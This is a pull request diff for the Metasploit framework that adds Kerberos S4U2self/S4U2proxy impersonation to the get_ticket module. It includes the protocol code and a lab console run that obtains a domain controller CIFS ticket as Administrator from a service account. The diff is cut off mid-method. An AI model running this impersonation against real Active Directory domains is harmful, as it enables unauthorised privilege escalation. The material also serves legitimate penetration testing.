### PR TITLE
Enable the `get_ticket` module to impersonate a user with S4U2self and S4U2proxy

### DIFF
--- a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
@@ -49,6 +49,10 @@ keys: 128 or 256 bits.
 The Service Principal Name, the format is `service_name/FQDN` . Ex:
 cifs/dc01.mydomain.local. This option is only used when requesting a TGS.
 
+### IMPERSONATE
+The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to
+request the ticket).
+
 ### KrbUseCachedCredentials
 If set to `true`, it looks for a matching TGT in the database and, if found,
 use it for Kerberos authentication. Default is `true`.
@@ -233,5 +237,28 @@ host             service  type                 name  content                   i
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104183244_default_10.0.0.24_mit.kerberos.cca_360960.bin
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: administrator     /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_200958.bin
 10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221104183538_default_10.0.0.24_mit.kerberos.cca_849639.bin
+```
+
+- TGS impersonating the Administrator account
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
+[*] Running module against 10.0.0.24
+
+[*] 10.0.0.24:88 - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/dc02.mylab.local)
+[+] 10.0.0.24:88 - Received a valid TGT-Response
+[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[+] 10.0.0.24:88 - Received a valid TGS-Response
+[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > loot
+
+Loot
+====
+
+host             service  type                 name  content                   info                                                                             path
+----             -------  ----                 ----  -------                   ----                                                                             ----
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: krbtgt/mylab.local, username: servicea          /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
+10.0.0.24                 mit.kerberos.ccache        application/octet-stream  realm: MYLAB.LOCAL, serviceName: cifs/dc02.mylab.local, username: administrator  /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
 ```
 

--- a/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
+++ b/documentation/modules/auxiliary/admin/kerberos/get_ticket.md
@@ -55,7 +55,9 @@ request the ticket).
 
 ### KrbUseCachedCredentials
 If set to `true`, it looks for a matching TGT in the database and, if found,
-use it for Kerberos authentication. Default is `true`.
+use it for Kerberos authentication when requesting a TGS. Note that this option
+only applies to `GET_TGS` action and has no effect on the `GET_TGT` action.
+Default is `true`.
 
 ## Scenarios
 

--- a/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
@@ -232,6 +232,7 @@ module Msf
             # @option opts [String] :realm
             # @option opts [Rex::Proto::Kerberos::Model::PrincipalName] :sname
             # @option opts [Rex::Proto::Kerberos::Model::EncryptedData] :enc_auth_data
+            # @option opts [Array<Rex::Proto::Kerberos::Model::EncryptedData>] :additional_tickets
             # @return [Rex::Proto::Kerberos::Model::KdcRequestBody]
             # @see Rex::Proto::Kerberos::Model::PrincipalName
             # @see Rex::Proto::Kerberos::Model::KdcRequestBody
@@ -246,6 +247,7 @@ module Msf
               realm = opts.fetch(:realm) { '' }
               sname = opts.fetch(:sname) { build_server_name(opts) }
               enc_auth_data = opts[:enc_auth_data] || nil
+              additional_tickets = opts[:additional_tickets] || nil
 
               body = Rex::Proto::Kerberos::Model::KdcRequestBody.new(
                 options: options,
@@ -257,7 +259,8 @@ module Msf
                 rtime: rtime,
                 nonce: nonce,
                 etype: etype,
-                enc_auth_data: enc_auth_data
+                enc_auth_data: enc_auth_data,
+                additional_tickets: additional_tickets
               )
 
               body
@@ -284,6 +287,41 @@ module Msf
 
               checksum
             end
+
+            def build_pa_for_user(opts = {})
+              auth_package = 'Kerberos'.b
+
+              checksum_data = [Rex::Proto::Kerberos::Model::NameType::NT_PRINCIPAL].pack('<I')
+              checksum_data << opts[:username].b
+              checksum_data << opts[:realm].b
+              checksum_data << auth_package
+
+              checksummer = Rex::Proto::Kerberos::Crypto::Checksum.from_checksum_type(
+                Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5
+              )
+              checksum = Rex::Proto::Kerberos::Model::Checksum.new
+              checksum.type = Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5
+              checksum.checksum = checksummer.checksum(
+                opts[:session_key].value,
+                Rex::Proto::Kerberos::Crypto::KeyUsage::KERB_NON_KERB_CKSUM_SALT,
+                checksum_data
+              )
+
+              pa_for_user = Rex::Proto::Kerberos::Model::PreAuthForUser.new
+              pa_for_user.user_name = Rex::Proto::Kerberos::Model::PrincipalName.new(
+                name_type: Rex::Proto::Kerberos::Model::NameType::NT_PRINCIPAL,
+                name_string: [ opts[:username] ]
+              )
+              pa_for_user.user_realm = opts[:realm]
+              pa_for_user.cksum = checksum
+              pa_for_user.auth_package = auth_package
+
+              Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(
+                type: Rex::Proto::Kerberos::Model::PreAuthType::PA_FOR_USER,
+                value: pa_for_user.encode
+              )
+            end
+
           end
         end
       end

--- a/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
@@ -288,6 +288,15 @@ module Msf
               checksum
             end
 
+            # Builds a Kerberos PA-FOR-USER pa-data
+            #
+            # @param opts [Hash]
+            # @option opts [String] :username The name of the user on whose
+            #   behalf the service requests the service ticket
+            # @option opts [String] :realm The realm in which the user account is located
+            # @option opts [Rex::Proto::Kerberos::Model::EncryptionKey] :session_key The session key of the TGT
+            # @return [Rex::Proto::Kerberos::Model::PreAuthDataEntry]
+            # @see https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/aceb70de-40f0-4409-87fa-df00ca145f5a
             def build_pa_for_user(opts = {})
               auth_package = 'Kerberos'.b
 

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -283,12 +283,13 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   end
 
   # @param [Hash] options
+  # @option options [Boolean] :use_cached_credentials Override the @use_cached_credentials attribute
   # @see #authenticate_via_kdc Options dcoumentation
-  # @see #get_cached_credential Other options dcoumentation
+  # @see #get_cached_credential Other options documentation
   # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
   def request_tgt_only(options = {})
     credential = nil
-    if use_cached_credentials
+    if options.fetch(:use_cached_credentials) { use_cached_credentials }
       credential = get_cached_credential(
         options.merge(
           sname: Rex::Proto::Kerberos::Model::PrincipalName.new(
@@ -310,9 +311,31 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     return auth_context[:credential]
   end
 
+  # @param [Hash] options
+  # @option options [Boolean] :use_cached_credentials Override the @use_cached_credentials attribute
+  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] :credential
+  #   The ccache credential from the TGT
+  # @see #authenticate_via_krb5_ccache_credential_tgt Options dcoumentation
+  # @see #get_cached_credential Other options dcoumentation
+  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
+  def request_tgs_only(credential, options = {})
+    if options.fetch(:use_cached_credentials) { use_cached_credentials }
+      # load a cached TGS
+      ccache = get_cached_credential(options)
+      if ccache
+        print_status("#{peer} - Using cached credential for #{ccache.server} #{ccache.client}")
+        return ccache
+      end
+    end
+
+    auth_context = authenticate_via_krb5_ccache_credential_tgt(credential, options)
+    auth_context[:credential]
+  end
+
   # Request a service ticket to itself on behalf of a user
   #
-  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential from the TGT
+  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] :credential
+  #   The ccache credential from the TGT
   # @param [Hash] options
   # @option options [Rex::Proto::Kerberos::Model::PrincipalName] :sname The target service principal name.
   # @option options [Boolean] :store_credential_cache Override the @store_credential_cache attribute
@@ -384,7 +407,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       value: credential.keyblock.data.value
     )
 
-    pa_pac_options_flags = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
+    pa_pac_options_flags = Rex::Proto::Kerberos::Model::PreAuthPacOptionsFlags.from_flags(
       [
         Rex::Proto::Kerberos::Model::PreAuthPacOptionsFlags::RESOURCE_BASED_CONSTRAINED_DELEGATION
       ]
@@ -404,8 +427,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     tgs_options = {
       pa_data: pa_data_entry,
-      additional_flags: Rex::Proto::Kerberos::Model::KdcOptionFlags::CNAME_IN_ADDL_TKT,
-      additional_tickets: options[:tgs_ticket],
+      additional_flags: [Rex::Proto::Kerberos::Model::KdcOptionFlags::CNAME_IN_ADDL_TKT],
+      additional_tickets: [options[:tgs_ticket]],
       store_credential_cache: options.fetch(:store_credential_cache) { store_credential_cache },
       credential_cache_username: options[:impersonate]
     }
@@ -780,7 +803,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       Rex::Proto::Kerberos::Model::KdcOptionFlags::CANONICALIZE,
     ])
     if options[:additional_flags].present?
-      additional_flags = [options[:additional_flags]] unless options[:additional_flags].is_a?(::Enumerable)
+      additional_flags = options[:additional_flags]
+      additional_flags = [additional_flags] unless additional_flags.is_a?(::Enumerable)
       flags.merge(additional_flags)
     end
     ticket_options = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(flags)
@@ -801,7 +825,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       ctime: now
     }
     if options[:additional_tickets].present?
-      additional_tickets = [options[:additional_tickets]] unless options[:additional_tickets].is_a?(::Enumerable)
+      additional_tickets = options[:additional_tickets]
+      additional_tickets = [additional_tickets] unless additional_tickets.is_a?(::Enumerable)
       tgs_body_options[:additional_tickets] = additional_tickets
     end
 

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -69,6 +69,14 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   #   @return [String] whether to store Kerberos TGS MIT Credential Cache to the database
   attr_reader :store_credential_cache
 
+  # @!attribute [r] key
+  #   @return [String] the encryption key for authentication
+  attr_reader :key
+
+  # @!attribute [r] etype
+  #   @return [String] the encryption key type
+  attr_reader :etype
+
   def_delegators :@framework_module,
                 :print_status,
                 :print_good,
@@ -105,7 +113,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       send_delegated_creds: Delegation::ALWAYS,
       cache_file: nil,
       use_cached_credentials: true,
-      store_credential_cache: true
+      store_credential_cache: true,
+      key: nil,
+      etype: nil
   )
     @realm = realm
     @hostname = hostname
@@ -122,6 +132,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     @send_delegated_creds = send_delegated_creds
     @use_cached_credentials = use_cached_credentials
     @store_credential_cache = store_credential_cache
+    @key = key
+    @etype = etype
 
     credential = nil
     if cache_file.present?
@@ -192,6 +204,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       auth_context = authenticate_via_krb5_ccache_credential_tgs(options[:credential], options)
     else
       auth_context = authenticate_via_kdc(options)
+      auth_context = authenticate_via_krb5_ccache_credential_tgt(auth_context[:credential], options)
     end
 
     ap_request_asn1 = auth_context.delete(:service_ap_request).to_asn1
@@ -269,10 +282,151 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     nil
   end
 
+  # @param [Hash] options
+  # @see #authenticate_via_kdc Options dcoumentation
+  # @see #get_cached_credential Other options dcoumentation
+  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
+  def request_tgt_only(options = {})
+    credential = nil
+    if use_cached_credentials
+      credential = get_cached_credential(
+        options.merge(
+          sname: Rex::Proto::Kerberos::Model::PrincipalName.new(
+            name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+            name_string: [
+              "krbtgt",
+              realm
+            ]
+          )
+        )
+      )
+      if credential
+        print_status("#{peer} - Using cached credential for #{credential.server} #{credential.client}")
+        return credential
+      end
+    end
+
+    auth_context = authenticate_via_kdc(options)
+    return auth_context[:credential]
+  end
+
+  # Request a service ticket to itself on behalf of a user
+  #
+  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential from the TGT
+  # @param [Hash] options
+  # @option options [Rex::Proto::Kerberos::Model::PrincipalName] :sname The target service principal name.
+  # @option options [Boolean] :store_credential_cache Override the @store_credential_cache attribute
+  # @option options [String] :impersonate The name of the user to request a ticket on behalf of
+  # @return [Array] The TGS ticket and the decrypted TGS credentials as a MIT Cache Credential
+  def s4u2self(credential, options = {})
+    realm = self.realm.upcase
+    sname = options.fetch(:sname)
+    client_name = username
+
+    now = Time.now.utc
+    expiry_time = now + 1.day
+
+    ticket = Rex::Proto::Kerberos::Model::Ticket.decode(credential.ticket.value)
+    session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.value,
+      value: credential.keyblock.data.value
+    )
+
+    etypes = Set.new([ticket.enc_part.etype])
+    etypes << Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
+
+    tgs_options = {
+      store_credential_cache: options.fetch(:store_credential_cache) { store_credential_cache },
+      credential_cache_username: options[:impersonate],
+      pa_data: build_pa_for_user(
+        {
+          username: options[:impersonate],
+          session_key: session_key,
+          realm: realm
+        }
+      )
+    }
+
+    request_service_ticket(
+      session_key,
+      ticket,
+      realm,
+      client_name,
+      etypes,
+      expiry_time,
+      now,
+      sname,
+      tgs_options
+    )
+  end
+
+  # Request a service ticket to another service on behalf of a user
+  #
+  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential from the TGT
+  # @param [Hash] options
+  # @option options [Rex::Proto::Kerberos::Model::PrincipalName] :sname The target service principal name.
+  # @option options [Rex::Proto::Kerberos::Model::Ticket] :tgs_ticket The service ticket to the first service.
+  #   It must have the forwardable flag set. This ticket can be obtained with #s4u2self.
+  # @option options [Boolean] :store_credential_cache Override the @store_credential_cache attribute
+  # @option options [String] :impersonate The name of the user to request a ticket on behalf of
+  # @return [Array] The new TGS ticket and the decrypted TGS credentials as a MIT Cache Credential
+  def s4u2proxy(credential, options = {})
+    realm = self.realm.upcase
+    sname = options.fetch(:sname)
+    client_name = username
+
+    now = Time.now.utc
+    expiry_time = now + 1.day
+
+    ticket = Rex::Proto::Kerberos::Model::Ticket.decode(credential.ticket.value)
+    session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.value,
+      value: credential.keyblock.data.value
+    )
+
+    pa_pac_options_flags = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
+      [
+        Rex::Proto::Kerberos::Model::PreAuthPacOptionsFlags::RESOURCE_BASED_CONSTRAINED_DELEGATION
+      ]
+    )
+    pa_pac_options = Rex::Proto::Kerberos::Model::PreAuthPacOptions.new(
+      flags: pa_pac_options_flags
+    )
+    pa_data_entry = Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(
+      type: Rex::Proto::Kerberos::Model::PreAuthType::PA_PAC_OPTIONS,
+      value: pa_pac_options.encode
+    )
+
+    etypes = Set.new(etypes)
+    etypes << Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC
+    etypes << Rex::Proto::Kerberos::Crypto::Encryption::DES_CBC_MD5
+    etypes << Rex::Proto::Kerberos::Crypto::Encryption::DES3_CBC_SHA1
+
+    tgs_options = {
+      pa_data: pa_data_entry,
+      additional_flags: Rex::Proto::Kerberos::Model::KdcOptionFlags::CNAME_IN_ADDL_TKT,
+      additional_tickets: options[:tgs_ticket],
+      store_credential_cache: options.fetch(:store_credential_cache) { store_credential_cache },
+      credential_cache_username: options[:impersonate]
+    }
+
+    request_service_ticket(
+      session_key,
+      ticket,
+      realm,
+      client_name,
+      etypes,
+      expiry_time,
+      now,
+      sname,
+      tgs_options
+    )
+  end
+
+
   private
 
-  # Authenticate with credentials to the key distribution center (KDC). This will request a TGT before then pass it to
-  # #authenticate_via_krb5_ccache_credential_tgt.
+  # Authenticate with credentials to the key distribution center (KDC). This will request a TGT only.
   #
   # @param [Hash] options
   def authenticate_via_kdc(options = {})
@@ -293,6 +447,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       server_name: server_name,
       client_name: client_name,
       password: password,
+      key: key,
+      etype: etype,
       realm: realm,
       options: ticket_options
     )
@@ -303,11 +459,22 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       )
     end
 
-    print_status("#{peer} - Received a valid TGT-Response")
+    print_good("#{peer} - Received a valid TGT-Response")
 
     cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(tgt_result.as_rep, tgt_result.decrypted_part)
+
+    if store_credential_cache
+      path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, cache.encode, nil, loot_info(sname: server_name))
+      print_status("#{peer} - TGT MIT Credential Cache saved to #{path}")
+    end
+
     credential = cache.credentials.first
-    authenticate_via_krb5_ccache_credential_tgt(credential, options)
+    session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.value,
+      value: credential.keyblock.data.value
+    )
+
+    { credential: credential, session_key: session_key }
   end
 
   # Authenticate with a ticket-granting-service (TGS). This method will not contact the KDC and can not request a
@@ -387,15 +554,22 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       value: credential.keyblock.data.value
     )
 
+    etypes = Set.new([ticket.enc_part.etype])
+    tgs_options = {
+      pa_data: [],
+      store_credential_cache: store_credential_cache
+    }
+
     tgs_ticket, tgs_auth = request_service_ticket(
       session_key,
       ticket,
       realm,
       client_name,
-      ticket.enc_part.etype,
+      etypes,
       expiry_time,
       now,
-      sname
+      sname,
+      tgs_options
     )
 
     case send_delegated_creds
@@ -578,48 +752,77 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
   # @param [Rex::Proto::Kerberos::Model::Ticket] tgt_ticket
   # @param [String] realm
   # @param [String] client_name
-  # @param [Integer] tgt_etype
+  # @param [Integer] etypes
   # @param [Time] expiry_time
   # @param [Time] now
   # @param [Rex::Proto::Kerberos::Model::PrincipalName] sname
+  # @param [Hash] options
+  # @option options [Array<Rex::Proto::Kerberos::Model::KdcOptionFlags>] :additional_flags
+  #   Any additional flags to add to the TGS request option flags. The
+  #   FORWARDABLE, RENEWABLE and CANONICALIZE flags are set by default.
+  # @option options [Array<Rex::Proto::Kerberos::Model::Ticket>] :additional_tickets
+  #   Any additional tickets to add to the request
+  # @option options [Array<Rex::Proto::Kerberos::Model::PreAuthDataEntry>] :pa_data
+  #   Any additional pre-auth data entries to add to the request
+  # @option options [Boolean] :store_credential_cache Override the @store_credential_cache attribute
+  # @option options [String] :credential_cache_username The name of user
+  #   corresponding to the requested TGS ticket. This name will be used in
+  #   the info field when the tickets is stored in the database. This can be used
+  #   to override the original username in case of impersonation.
   # @raise [Rex::Proto::Kerberos::Model::Error::KerberosError]
-  def request_service_ticket(session_key, tgt_ticket, realm, client_name, tgt_etype, expiry_time, now, sname)
-    ticket_options = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
-      [
-        Rex::Proto::Kerberos::Model::KdcOptionFlags::FORWARDABLE,
-        Rex::Proto::Kerberos::Model::KdcOptionFlags::RENEWABLE,
-        Rex::Proto::Kerberos::Model::KdcOptionFlags::CANONICALIZE,
-      ]
-    )
+  # @return [Array] The TGS ticket and the decrypted TGS credentials as a MIT Cache Credential
+  def request_service_ticket(session_key, tgt_ticket, realm, client_name, etypes, expiry_time, now, sname, options = {})
+    etypes = etypes.is_a?(::Enumerable) ? etypes : [etypes]
+
+    flags = Set.new([
+      Rex::Proto::Kerberos::Model::KdcOptionFlags::FORWARDABLE,
+      Rex::Proto::Kerberos::Model::KdcOptionFlags::RENEWABLE,
+      Rex::Proto::Kerberos::Model::KdcOptionFlags::CANONICALIZE,
+    ])
+    if options[:additional_flags].present?
+      additional_flags = [options[:additional_flags]] unless options[:additional_flags].is_a?(::Enumerable)
+      flags.merge(additional_flags)
+    end
+    ticket_options = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(flags)
+
+    tgs_body_options = {
+      cname: nil,
+      sname: sname,
+      realm: realm,
+      etype: etypes,
+      options: ticket_options,
+
+      # Specify nil to ensure the KDC uses the current time for the desired starttime of the requested ticket
+      from: nil,
+      till: expiry_time,
+      rtime: nil,
+
+      # certificate time
+      ctime: now
+    }
+    if options[:additional_tickets].present?
+      additional_tickets = [options[:additional_tickets]] unless options[:additional_tickets].is_a?(::Enumerable)
+      tgs_body_options[:additional_tickets] = additional_tickets
+    end
+
+    tgs_options = {
+      session_key: session_key,
+      subkey: nil,
+      checksum: nil,
+      ticket: tgt_ticket,
+      realm: realm,
+      client_name: client_name,
+      options: ticket_options,
+
+      body: build_tgs_request_body(**tgs_body_options)
+    }
+    if options[:pa_data].present?
+      pa_data = [options[:pa_data]] unless options[:pa_data].is_a?(::Enumerable)
+      tgs_options[:pa_data] = pa_data
+    end
 
     tgs_res = send_request_tgs(
-      req: build_tgs_request(
-        {
-          session_key: session_key,
-          subkey: nil,
-          checksum: nil,
-          ticket: tgt_ticket,
-          realm: realm,
-          client_name: client_name,
-          options: ticket_options,
-
-          body: build_tgs_request_body(
-            cname: nil,
-            sname: sname,
-            realm: realm,
-            etype: [tgt_etype],
-            options: ticket_options,
-
-            # Specify nil to ensure the KDC uses the current time for the desired starttime of the requested ticket
-            from: nil,
-            till: expiry_time,
-            rtime: nil,
-
-            # certificate time
-            ctime: now
-          )
-        }
-      )
+        req: build_tgs_request(tgs_options)
     )
 
     # Verify error codes
@@ -629,13 +832,15 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     print_good("#{peer} - Received a valid TGS-Response")
 
-    if store_credential_cache
+    if options.fetch(:store_credential_cache) { store_credential_cache }
       cache = extract_kerb_creds(
         tgs_res,
         session_key.value,
         msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
       )
-      path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, cache.encode, nil, loot_info(sname: sname))
+      loot_options = { sname: sname }
+      loot_options[:username] = options[:credential_cache_username] if options[:credential_cache_username].present?
+      path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, cache.encode, nil, loot_info(loot_options))
       print_status("#{peer} - TGS MIT Credential Cache saved to #{path}")
     end
 
@@ -738,8 +943,10 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
     info << "realm: #{self.realm.upcase}" if self.realm
     info << "serviceName: #{options[:sname].to_s.downcase}" if options[:sname]
-    info << "username: #{self.username.downcase}" if self.username
+    username = options.fetch(:username) { self.username }
+    info << "username: #{username.downcase}" if username
 
     info.join(', ')
   end
+
 end

--- a/lib/rex/proto/kerberos/model.rb
+++ b/lib/rex/proto/kerberos/model.rb
@@ -1,4 +1,4 @@
-# -*- coding: binary -*-
+ # -*- coding: binary -*-
 
 module Rex
   module Proto
@@ -61,7 +61,9 @@ module Rex
           PA_PK_AS_REP = 17
           PA_ETYPE_INFO2 = 19
           PA_PAC_REQUEST = 128
+          PA_FOR_USER = 129
           PA_SUPPORTED_ETYPES = 165
+          PA_PAC_OPTIONS = 167
         end
 
         AD_IF_RELEVANT = 1

--- a/lib/rex/proto/kerberos/model/kdc_option_flags.rb
+++ b/lib/rex/proto/kerberos/model/kdc_option_flags.rb
@@ -22,6 +22,7 @@ module Rex
           HW_AUTHNET = 11
           TRANSITED_POLICY_CHECKED = 12
           OK_AS_DELEGATE = 13
+          CNAME_IN_ADDL_TKT = 14
           CANONICALIZE = 15
           RENEWABLE_OK = 27
           ENC_TKT_IN_SKEY = 28

--- a/lib/rex/proto/kerberos/model/pre_auth_data_entry.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_data_entry.rb
@@ -73,6 +73,9 @@ module Rex
             when Rex::Proto::Kerberos::Model::PreAuthType::PA_PAC_REQUEST
               decoded = OpenSSL::ASN1.decode(self.value)
               PreAuthPacRequest.decode(decoded)
+            when Rex::Proto::Kerberos::Model::PreAuthType::PA_FOR_USER
+              decoded = OpenSSL::ASN1.decode(self.value)
+              PreAuthForUser.decode(decoded)
             else
               # Unknown type - just ignore for now
             end

--- a/lib/rex/proto/kerberos/model/pre_auth_for_user.rb
+++ b/lib/rex/proto/kerberos/model/pre_auth_for_user.rb
@@ -1,0 +1,161 @@
+module Rex
+  module Proto
+    module Kerberos
+      module Model
+        # This class is a representation of a PA-FOR-USER, pre authenticated
+        # data to identify the user on whose behalf a service requests a
+        # service ticket, as defined in
+        # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/aceb70de-40f0-4409-87fa-df00ca145f5a
+        class PreAuthForUser < Element
+
+          # @!attribute user_name
+          #   @return [Rex::Proto::Kerberos::Model::PrincipalName] The name
+          #   part of the user's principal identifier
+          attr_accessor :user_name
+          # @!attribute user_realm
+          #   @return [String] The realm part of the user's principal identifier
+          attr_accessor :user_realm
+          # @!attribute cksum
+          #   @return [Rex::Proto::Kerberos::Model::Checksum] The checksum of
+          #   user_name, user_realm, and auth_package.
+          attr_accessor :cksum
+          # @!attribute auth_package
+          #   @return [String] The authentication mechanism used to
+          #   authenticate the user.
+          attr_accessor :auth_package
+
+          # Decodes the Rex::Proto::Kerberos::Model::PreAuthForUser from an input
+          #
+          # @param input [String, OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [self] if decoding succeeds
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode(input)
+            case input
+            when String
+              decode_string(input)
+            when OpenSSL::ASN1::ASN1Data
+              decode_asn1(input)
+            else
+              raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode PreAuthForUser, invalid input'
+            end
+
+            self
+          end
+
+          # Encodes the Rex::Proto::Kerberos::Model::PreAuthForUser into an ASN.1 String
+          #
+          # @return [String]
+          def encode
+            elems = []
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_user_name], 0, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_user_realm], 1, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_cksum], 2, :CONTEXT_SPECIFIC)
+            elems << OpenSSL::ASN1::ASN1Data.new([encode_auth_package], 3, :CONTEXT_SPECIFIC)
+
+            seq = OpenSSL::ASN1::Sequence.new(elems)
+
+            seq.to_der
+          end
+
+          # Encodes the user_name attribute
+          #
+          # @return [String]
+          def encode_user_name
+            user_name.encode
+          end
+
+          # Encodes the user_realm attribute
+          #
+          # @return [OpenSSL::ASN1::GeneralString]
+          def encode_user_realm
+            OpenSSL::ASN1::GeneralString.new(user_realm)
+          end
+
+          # Encodes the cksum attribute
+          #
+          # @return [String]
+          def encode_cksum
+            cksum.encode
+          end
+
+          # Encodes the auth_package attribute
+          #
+          # @return [OpenSSL::ASN1::GeneralString]
+          def encode_auth_package
+            OpenSSL::ASN1::GeneralString.new(auth_package)
+          end
+
+          # Decodes a Rex::Proto::Kerberos::Model::PreAuthForUser from an String
+          #
+          # @param input [String] the input to decode from
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode_string(input)
+            asn1 = OpenSSL::ASN1.decode(input)
+
+            decode_asn1(asn1)
+          rescue OpenSSL::ASN1::ASN1Error
+            raise Rex::Proto::Kerberos::Model::Error::KerberosDecodingError
+          end
+
+          # Decodes a Rex::Proto::Kerberos::Model::PreAuthForUser from an
+          # OpenSSL::ASN1::Sequence
+          #
+          # @param input [OpenSSL::ASN1::Sequence] the input to decode from
+          # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if decoding doesn't succeed
+          def decode_asn1(input)
+            seq_values = input.value
+
+            seq_values.each do |val|
+              case val.tag
+              when 0
+                self.user_name = decode_user_name(val)
+              when 1
+                self.user_realm = decode_user_realm(val)
+              #when 2
+              #  self.cksum = decode_cksum(val)
+              when 3
+                self.auth_package = decode_auth_package(val)
+              else
+                raise ::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, 'Failed to decode KdcRequestBody SEQUENCE'
+              end
+            end
+          end
+
+          # Decodes the user_name field
+          #
+          # @param input [OpenSSL::ASN1::ASN1Data] the input to decode from
+          # @return [Rex::Proto::Kerberos::Model::PrincipalName]
+          def decode_cname(input)
